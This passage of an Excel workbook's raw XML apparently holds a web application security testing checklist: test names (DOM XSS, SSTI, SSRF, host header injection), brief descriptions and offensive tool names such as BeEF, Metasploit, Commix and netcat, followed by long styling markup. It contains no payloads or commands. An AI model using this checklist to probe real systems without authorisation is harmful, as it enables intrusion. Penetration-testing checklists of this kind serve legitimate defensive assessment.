  </si>
  <si>
    <t>Testing Cross Origin Resource Sharing</t>
  </si>
  <si>
    <t>Testing for Client-side Resource Manipulation</t>
  </si>
  <si>
    <t>Testing for Client-side URL Redirect</t>
  </si>
  <si>
    <t>Testing for DOM-Based Cross Site Scripting</t>
  </si>
  <si>
    <t>Test Defenses Against Application Misuse</t>
  </si>
  <si>
    <t>Input Validation Testing</t>
  </si>
  <si>
    <t>Testing for HTTP Parameter Pollution</t>
  </si>
  <si>
    <t>Testing for Oracle</t>
  </si>
  <si>
    <t>Testing for SQL Server</t>
  </si>
  <si>
    <t>Testing for MySQL</t>
  </si>
  <si>
    <t>Testing for MS Access</t>
  </si>
  <si>
    <t>Testing for ORM injection</t>
  </si>
  <si>
    <t>Testing for Client-side</t>
  </si>
  <si>
    <t>Client-side SQL injection occurs when an application implements the Web SQL Database</t>
  </si>
  <si>
    <t>Testing for Format String Injection</t>
  </si>
  <si>
    <t>A format string is a null-terminated character sequence that also contains conversion specifiers interpreted or converted at runtime</t>
  </si>
  <si>
    <t>Flawfinder, phpsa</t>
  </si>
  <si>
    <t>Testing for Incubated Vulnerability</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, netcat</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Liffy, Panoptic</t>
  </si>
  <si>
    <t>Burp Suite, fimap, Liffy</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Commix</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, BeEF, MSF</t>
  </si>
  <si>
    <t>Testing for HTTP Splitting / Smuggling</t>
  </si>
  <si>
    <t>Testing for HTTP Incoming Requests</t>
  </si>
  <si>
    <t>The purpose of this testing is to verify if there is unnecessary or suspicious HTTP request sending in the background</t>
  </si>
  <si>
    <t>Fiddler, TCPProxy,Charles Web Debugging Proxy,WireShark,PowerEdit-Pcap,pcapteller,replayproxy,Ostinato</t>
  </si>
  <si>
    <t>Testing for Host Header Injection</t>
  </si>
  <si>
    <t>Manipulate host header, it's possible to perfom differents attacks like Host Header Injection, X-Forwarded Host Header Bypass,Web Cache Poisoning, Password Reset Poisoning</t>
  </si>
  <si>
    <t>Testing for Server-Side Request Forgery</t>
  </si>
  <si>
    <t>Testing for Server-Side Template Injection</t>
  </si>
  <si>
    <t>SSTI occur when user input is embedded in a template in an unsafe manner and results in remote code execution on the server</t>
  </si>
  <si>
    <t>tlpmap, Burp Suite</t>
  </si>
  <si>
    <t>While you may expect that only the intended resource will be handling the data you send, improperly handled data may create a situation where injection attacks are possible</t>
  </si>
  <si>
    <t>Browser, Burp Suite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</si>
</sst>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0"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color theme="0" tint="-0.499984740745262"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color indexed="23"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="9"/>
      <color theme="0" tint="-0.499984740745262"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="9"/>
      <color indexed="23"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="10"/>
      <color theme="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color theme="0"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="0"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color theme="0" tint="-0.499984740745262"/>
      <name val="Arial"/>
    </font>
  </fonts>
  <fills count="6">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
      <patternFill patternType="solid">
        <fgColor theme="3" tint="-0.249977111117893"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4" tint="0.79998168889431442"/>
        <bgColor theme="4" tint="0.79998168889431442"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="7">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color theme="0"/>
      </left>
      <right/>
      <top style="medium">
        <color theme="0"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color theme="0"/>
      </right>
      <top style="medium">
        <color theme="0"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color theme="0"/>
      </left>
      <right/>
      <top/>
      <bottom style="medium">
        <color theme="0"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color theme="0"/>
      </right>
      <top/>
      <bottom style="medium">
        <color theme="0"/>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style="medium">
        <color theme="4"/>
      </bottom>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="2">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
  </cellStyleXfs>
  <cellXfs count="29">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="3" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="3" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="5" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="5" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="5" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="2" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="5" borderId="5" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="4" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="4" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="4" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
  </cellXfs>
  <cellStyles count="2">
    <cellStyle name="Hipervínculo" xfId="1" builtinId="8"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="156">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alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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protection locked="0" hidden="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protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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protection locked="0" hidden="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protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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protection locked="0" hidden="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protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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protection locked="0" hidden="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protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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protection locked="0" hidden="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protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color indexed="23"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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protection locked="0" hidden="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protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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protection locked="0" hidden="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protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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protection locked="0" hidden="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protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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protection locked="0" hidden="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protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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protection locked="0" hidden="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protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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protection locked="0" hidden="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protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="0"/>
    </dxf>
    <dxf>
      <alignment vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <protection locked="0" hidden="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4:F13" totalsRowShown="0" headerRowDxfId="155" dataDxfId="154">
  <autoFilter ref="A4:F13"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Information Gathering" dataDxfId="153"/>
    <tableColumn id="2" name="Test Name" dataDxfId="152"/>
    <tableColumn id="3" name="Description" dataDxfId="151"/>
    <tableColumn id="4" name="Tools" dataDxfId="150"/>
    <tableColumn id="5" name="Result" dataDxfId="149"/>
    <tableColumn id="6" name="Remark" dataDxfId="148"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
</table>
</file>

<file path=xl/tables/table10.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="14" name="Table61415" displayName="Table61415" ref="A98:F102" totalsRowShown="0" headerRowDxfId="83" dataDxfId="82">
  <autoFilter ref="A98:F102"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Cryptography" dataDxfId="81"/>
    <tableColumn id="2" name="Test Name" dataDxfId="80"/>
    <tableColumn id="3" name="Description" dataDxfId="79"/>
    <tableColumn id="4" name="Tools" dataDxfId="78"/>
    <tableColumn id="5" name="Result" dataDxfId="77"/>
    <tableColumn id="6" name="Remark" dataDxfId="76"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
</table>
</file>

<file path=xl/tables/table11.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="15" name="Table616" displayName="Table616" ref="A115:F128" totalsRowShown="0" headerRowDxfId="75" dataDxfId="74">
  <autoFilter ref="A115:F128"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Client Side Testing" dataDxfId="73"/>
    <tableColumn id="2" name="Test Name" dataDxfId="72"/>
    <tableColumn id="3" name="Description" dataDxfId="71"/>
